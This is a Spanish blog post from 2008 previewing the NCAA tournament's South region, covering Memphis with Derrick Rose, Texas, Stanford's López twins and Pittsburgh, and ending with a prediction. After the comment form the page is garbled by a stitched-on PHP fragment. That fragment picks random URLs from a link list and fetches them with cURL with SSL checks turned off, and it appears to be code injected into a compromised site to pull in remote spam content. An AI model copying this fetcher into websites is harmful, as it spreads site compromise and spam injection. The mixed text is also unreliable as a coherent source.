En Memphis no sólo hay ositos; también hay tigres

19 de March de 2008 por RusticoColorao

 

Los Tigers de Memphis con Derrick Rose a la cabezaNo todo iban a ser tristezas en la cuna de Elvis ¿no? Los Memphis Tigers (31-1) aparecen como cabeza de serie en la Conferencia SOUTH. El equipo dirigido por Calipari se ha convertido en la única esperanza de una ciudad sumida en las tinieblas baloncestísticas desde el traspaso de Gasol. Y a buen seguro que pueden conseguir el campeonato.

Los Tigers son un equipo rocoso, de los más físicos de la competición, pero no exento de calidad. Chris Douglas-Roberts (escolta que ha promediado 17 puntos con un 45% en triples) y Derrick Rose (base freshman que será el próximo número 2 del draft… si no el 1) conforman una de las mejores líneas exteriores de la competición. Junto a ellos, los Dorsey, Dozier, Taggart o Anderson componen un temible bloque que permaneció imbatido hasta febrero, cuando perdieron en su visita a Tennessee.

¿Algún candidato para infligir la segunda derrota de la temporada a Memphis? No os vamos a engañar, esto es la Locura de Marzo y aquí a menudo David vence a Goliath, pero a priori tres equipos se sitúan como serias alternativas a los Tigers: Texas (28-6), Stanford (26-7) y Pittsburgh (26-9).

Los gemelos López

Curiosa es la situación de Texas, un equipo que pensaba en una temporada de transición tras la marcha de Durant y que se encuentra como número 2 de la conferencia y con serias posibilidades de plantarse en la Final Four… y todo ello sin realizar ningún recruit importante, es decir, sólo con la base de jugadores que rodearon a Durant el año pasado. ¿Quizás Durant no era tan bueno? ¿La culpa la tenía Durant? Esto recuerda a cuando decían que el Madrid jugaba mejor sin Zidane. Y yo que creía que los buenos nunca estorbaban…

¿Aceptamos Jason Collins como jugador de baloncesto? Hace unos años los hermanos Collins conformaron las torres gemelas de los Cardinals de Stanford, papel que han heredado los gemelos López. Brook (19 puntos y 8 rebotes) y Robin López (10 puntos y casi 6 rebotes) conforman uno de los juegos interiores más poderosos del país (a años luz del de los gemelos Collins… tampoco es gran cosa). ¿Bastará con los twin López para plantar cara a Memphis?

Por último, pero no por ello con menos opciones, aparecen los Panthers de Pittsburg, equipo que viene de derrotar a Georgetown en la final de la Big East con un Sam Young (18 puntos y 6 rebotes durante la temporada) que está jugando a un nivel espectacular. Ojo con ellos. Posiblemente sean uno de los equipos más en forma y llegan con la moral por las nubes.

Jugadores que conviene seguir

Memphis: Derrick Rose… una delicia de jugador. Sin la fama de OJ Mayo pero con su mismo talento. Lo tiene todo para ser una futura estrella de la NBA.

Memphis: Chris Douglas-Roberts… elegido mejor escolta del país. Muchas de las opciones de los Tigers pasan por sus manos.

Stanford: Brook López… el mejor pívot de la NCAA en la temporada. Se rumorea que será drafteado en los primeros picks. Esperemos que no sea un Collins cualquiera.

Otros: TJ Augustine y AJ Abrams (Texas), Sam Young (Pittsburgh), Crawford (Kentucky), Neitzel y Morgan (Michigan State).

 

Mi pronóstico…

Apuesto por los Tigers de Memphis. No creo que Stanford o Texas les puedan ganar pero tengo una corazonada con Pittsburgh. Lástima la baja de Patterson en Kentucky… siempre he sido algo wildcat.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>